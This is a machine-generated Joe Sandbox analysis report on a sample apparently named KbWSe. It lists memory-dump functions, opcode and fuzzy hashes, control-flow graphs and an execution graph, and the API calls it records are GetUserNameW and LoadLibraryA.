                                                                                                                                              • Instruction ID: 4010c1b154afcde81014a467a434ceb44270a2e86f8cb7ce06664d2c129aed1a
                                                                                                                                              • Opcode Fuzzy Hash: 4a40b480d4fa50119ebda35aff352db3dffa7348ebbf36f966237d5faf07d1e9
                                                                                                                                              • Instruction Fuzzy Hash: 7B118E75504280DFDB21CF14D9C4B55BB62FB84314F28C6AEDC494B796C33AD85ACB62
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0064D819 Relevance: .0, Instructions: 45COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000013.00000002.546842072.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_19_2_64d000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bc7a589dc1f6b4e100a2ec664eced7fcde7f78a45b9e0d513580b180545bcfc6
                                                                                                                                              • Instruction ID: b28beed9618a8d6340d5ea514820d0d42dfda41a7532528f75f8d11220fc3631
                                                                                                                                              • Opcode Fuzzy Hash: bc7a589dc1f6b4e100a2ec664eced7fcde7f78a45b9e0d513580b180545bcfc6
                                                                                                                                              • Instruction Fuzzy Hash: 4301F771A04344AEE7209A2ACC847B7BF99DF55324F18851AED091A286C3799840C6B2
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 0064D818 Relevance: .0, Instructions: 36COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000013.00000002.546842072.000000000064D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0064D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_19_2_64d000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6da5ed564376ef832a6d1354fdd5501f25ddfb3c59905b5e50b691747541e6f5
                                                                                                                                              • Instruction ID: ecc5ba23eb2d7a2adafb0e4b7ba5fc1d9ccbe63438e31e9f4676cbe4bebf2d8a
                                                                                                                                              • Opcode Fuzzy Hash: 6da5ed564376ef832a6d1354fdd5501f25ddfb3c59905b5e50b691747541e6f5
                                                                                                                                              • Instruction Fuzzy Hash: FCF0C272A04244AEE7208A1ACC84BB6FF98EF41334F18C55AED481F382C3799C44CAB1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Execution Graph

                                                                                                                                              Execution Coverage:16.5%
                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                              Signature Coverage:0%
                                                                                                                                              Total number of Nodes:46
                                                                                                                                              Total number of Limit Nodes:8
                                                                                                                                              execution_graph 11344 df0448 11345 df044d 11344->11345 11346 df048f 11345->11346 11349 df0e6a 11345->11349 11353 df0e78 11345->11353 11350 df0e68 11349->11350 11350->11349 11351 df0ffa 11350->11351 11357 df1002 11350->11357 11351->11345 11355 df0e7e 11353->11355 11354 df0ffa 11354->11345 11355->11354 11356 df1002 2 API calls 11355->11356 11356->11355 11358 df1017 11357->11358 11359 df1122 11358->11359 11365 dff8d1 11358->11365 11370 dff8e0 11358->11370 11375 dff5a8 11358->11375 11380 dff598 11358->11380 11385 dff547 11358->11385 11359->11350 11366 dff8f8 11365->11366 11369 dff956 11366->11369 11390 dff554 11366->11390 11371 dff8f8 11370->11371 11372 dff554 GetUserNameW 11371->11372 11374 dff956 11371->11374 11373 dff948 11372->11373 11373->11358 11376 dff5ac 11375->11376 11379 dff61f 11376->11379 11394 dff184 11376->11394 11379->11358 11381 dff5a8 11380->11381 11382 dff184 GetUserNameW 11381->11382 11384 dff61f 11381->11384 11383 dff611 11382->11383 11383->11358 11384->11358 11386 dff54e 11385->11386 11387 dff184 GetUserNameW 11386->11387 11389 dff61f 11386->11389 11388 dff611 11387->11388 11388->11358 11389->11358 11392 dff6e0 GetUserNameW 11390->11392 11393 dff82d 11392->11393 11396 dff6e0 GetUserNameW 11394->11396 11397 dff82d 11396->11397 11398 df5ad0 11399 df5aee 11398->11399 11402 df5a64 11399->11402 11401 df5b25 11405 df75f0 LoadLibraryA 11402->11405 11404 df76e9 11405->11404

                                                                                                                                              Executed Functions

                                                                                                                                              Function 00DFF6D4 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1460 dff6d4-dff73f 1462 dff7aa-dff7ae 1460->1462 1463 dff741-dff76c 1460->1463 1464 dff7d9-dff7e4 1462->1464 1465 dff7b0-dff7d3 1462->1465 1472 dff76e-dff770 1463->1472 1473 dff79c 1463->1473 1467 dff7e6-dff7ee 1464->1467 1468 dff7f0-dff82b GetUserNameW 1464->1468 1465->1464 1467->1468 1469 dff82d-dff833 1468->1469 1470 dff834-dff84a 1468->1470 1469->1470 1476 dff84c-dff858 1470->1476 1477 dff860-dff887 1470->1477 1474 dff792-dff79a 1472->1474 1475 dff772-dff77c 1472->1475 1481 dff7a1-dff7a4 1473->1481 1474->1481 1478 dff77e 1475->1478 1479 dff780-dff78e 1475->1479 1476->1477 1486 dff889-dff88d 1477->1486 1487 dff897 1477->1487 1478->1479 1479->1479 1484 dff790 1479->1484 1481->1462 1484->1474 1486->1487 1488 dff88f 1486->1488 1489 dff898 1487->1489 1488->1487 1489->1489
                                                                                                                                              APIs
                                                                                                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00DFF81B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.554458083.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_df0000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: NameUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                              • Opcode ID: 8d138862d8447e38bd1514acd75c0bf0970b72d1e3be7ec1f8cbe755e87988cd
                                                                                                                                              • Instruction ID: aeaf8b07529a183e42c6b98fea6699753745e8316efb8e372ebd126cbe8d1084
                                                                                                                                              • Opcode Fuzzy Hash: 8d138862d8447e38bd1514acd75c0bf0970b72d1e3be7ec1f8cbe755e87988cd
                                                                                                                                              • Instruction Fuzzy Hash: 095124B4D002188FDB14DFA9C888BADFBB5BF48314F19C129E915BB394D774A844CBA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00DFF184 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1490 dff184-dff73f 1492 dff7aa-dff7ae 1490->1492 1493 dff741-dff76c 1490->1493 1494 dff7d9-dff7e4 1492->1494 1495 dff7b0-dff7d3 1492->1495 1502 dff76e-dff770 1493->1502 1503 dff79c 1493->1503 1497 dff7e6-dff7ee 1494->1497 1498 dff7f0-dff82b GetUserNameW 1494->1498 1495->1494 1497->1498 1499 dff82d-dff833 1498->1499 1500 dff834-dff84a 1498->1500 1499->1500 1506 dff84c-dff858 1500->1506 1507 dff860-dff887 1500->1507 1504 dff792-dff79a 1502->1504 1505 dff772-dff77c 1502->1505 1511 dff7a1-dff7a4 1503->1511 1504->1511 1508 dff77e 1505->1508 1509 dff780-dff78e 1505->1509 1506->1507 1516 dff889-dff88d 1507->1516 1517 dff897 1507->1517 1508->1509 1509->1509 1514 dff790 1509->1514 1511->1492 1514->1504 1516->1517 1518 dff88f 1516->1518 1519 dff898 1517->1519 1518->1517 1519->1519
                                                                                                                                              APIs
                                                                                                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00DFF81B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.554458083.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_df0000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: NameUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                              • Opcode ID: 344ab5fa4426e9e039bd2b90a5cd0b6eb1e4d33d7edd97bba4bdab1a9ffd3de1
                                                                                                                                              • Instruction ID: c17fe4ee089306cdbd9b3e13ade3d480fe66e472d37bcac79067584fee624a96
                                                                                                                                              • Opcode Fuzzy Hash: 344ab5fa4426e9e039bd2b90a5cd0b6eb1e4d33d7edd97bba4bdab1a9ffd3de1
                                                                                                                                              • Instruction Fuzzy Hash: 735112B4D002188FDB14DFA9C888BADFBB5BF48314F19C129E915BB394D774A844CBA5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00DFF554 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1520 dff554-dff73f 1522 dff7aa-dff7ae 1520->1522 1523 dff741-dff76c 1520->1523 1524 dff7d9-dff7e4 1522->1524 1525 dff7b0-dff7d3 1522->1525 1532 dff76e-dff770 1523->1532 1533 dff79c 1523->1533 1527 dff7e6-dff7ee 1524->1527 1528 dff7f0-dff82b GetUserNameW 1524->1528 1525->1524 1527->1528 1529 dff82d-dff833 1528->1529 1530 dff834-dff84a 1528->1530 1529->1530 1536 dff84c-dff858 1530->1536 1537 dff860-dff887 1530->1537 1534 dff792-dff79a 1532->1534 1535 dff772-dff77c 1532->1535 1541 dff7a1-dff7a4 1533->1541 1534->1541 1538 dff77e 1535->1538 1539 dff780-dff78e 1535->1539 1536->1537 1546 dff889-dff88d 1537->1546 1547 dff897 1537->1547 1538->1539 1539->1539 1544 dff790 1539->1544 1541->1522 1544->1534 1546->1547 1548 dff88f 1546->1548 1549 dff898 1547->1549 1548->1547 1549->1549
                                                                                                                                              APIs
                                                                                                                                              • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00DFF81B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.554458083.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_df0000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: NameUser
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2645101109-0
                                                                                                                                              • Opcode ID: 479aff50a54fbef2b2beac62516539516e845fcd06d50988f589b1061f6f0486
                                                                                                                                              • Instruction ID: 6a0fbb22e5ea0fab415954a64d52946023cce69dc4d09fe64b78b3dbbd174276
                                                                                                                                              • Opcode Fuzzy Hash: 479aff50a54fbef2b2beac62516539516e845fcd06d50988f589b1061f6f0486
                                                                                                                                              • Instruction Fuzzy Hash: 805111B4D002188FDB14DFA9C888BADFBB5BF48314F19C129E915AB394D774A844CFA4
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00DF75E5 Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1550 df75e5-df75ec 1551 df75ee-df75f1 1550->1551 1552 df75f2-df7647 1550->1552 1551->1552 1554 df769b-df76e7 LoadLibraryA 1552->1554 1555 df7649-df766e 1552->1555 1558 df76e9-df76ef 1554->1558 1559 df76f0-df7721 1554->1559 1555->1554 1560 df7670-df7672 1555->1560 1558->1559 1565 df7723-df7727 1559->1565 1566 df7731 1559->1566 1562 df7695-df7698 1560->1562 1563 df7674-df767e 1560->1563 1562->1554 1567 df7682-df7691 1563->1567 1568 df7680 1563->1568 1565->1566 1569 df7729 1565->1569 1571 df7732 1566->1571 1567->1567 1570 df7693 1567->1570 1568->1567 1569->1566 1570->1562 1571->1571
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 00DF76D7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.554458083.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_df0000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                              • Opcode ID: 8d420ab483dd3fc89638fe24743b89930c03f4db975d75f5584d5127615e493a
                                                                                                                                              • Instruction ID: a479189d9ce3d3e848b965be3bc974282e2f1945ebd0240348606e5c6ffed0fa
                                                                                                                                              • Opcode Fuzzy Hash: 8d420ab483dd3fc89638fe24743b89930c03f4db975d75f5584d5127615e493a
                                                                                                                                              • Instruction Fuzzy Hash: A54157B0D1461D8FDB10CFA9C9857EEBBF1AB48304F15C129E815EB384D7B498828FA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Function 00DF5A64 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON
                                                                                                                                              Download Yara Rule

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 1572 df5a64-df7647 1575 df769b-df76e7 LoadLibraryA 1572->1575 1576 df7649-df766e 1572->1576 1579 df76e9-df76ef 1575->1579 1580 df76f0-df7721 1575->1580 1576->1575 1581 df7670-df7672 1576->1581 1579->1580 1586 df7723-df7727 1580->1586 1587 df7731 1580->1587 1583 df7695-df7698 1581->1583 1584 df7674-df767e 1581->1584 1583->1575 1588 df7682-df7691 1584->1588 1589 df7680 1584->1589 1586->1587 1590 df7729 1586->1590 1592 df7732 1587->1592 1588->1588 1591 df7693 1588->1591 1589->1588 1590->1587 1591->1583 1592->1592
                                                                                                                                              APIs
                                                                                                                                              • LoadLibraryA.KERNELBASE(?), ref: 00DF76D7
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000017.00000002.554458083.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_23_2_df0000_KbWSe.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                              • Opcode ID: 542207006cb008f6a7748d280b62efc34c512eaaa3baf7e93f7059825660812a
                                                                                                                                              • Instruction ID: e9769dc2ac9c823bb20a3160859db04cf7cc340e201e12def8cc407510f66739
                                                                                                                                              • Opcode Fuzzy Hash: 542207006cb008f6a7748d280b62efc34c512eaaa3baf7e93f7059825660812a
                                                                                                                                              • Instruction Fuzzy Hash: 7A4144B0D1461D8FDB10CFA9C8857EEBBF5AB48304F258129E915EB380D7B49885CFA1
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%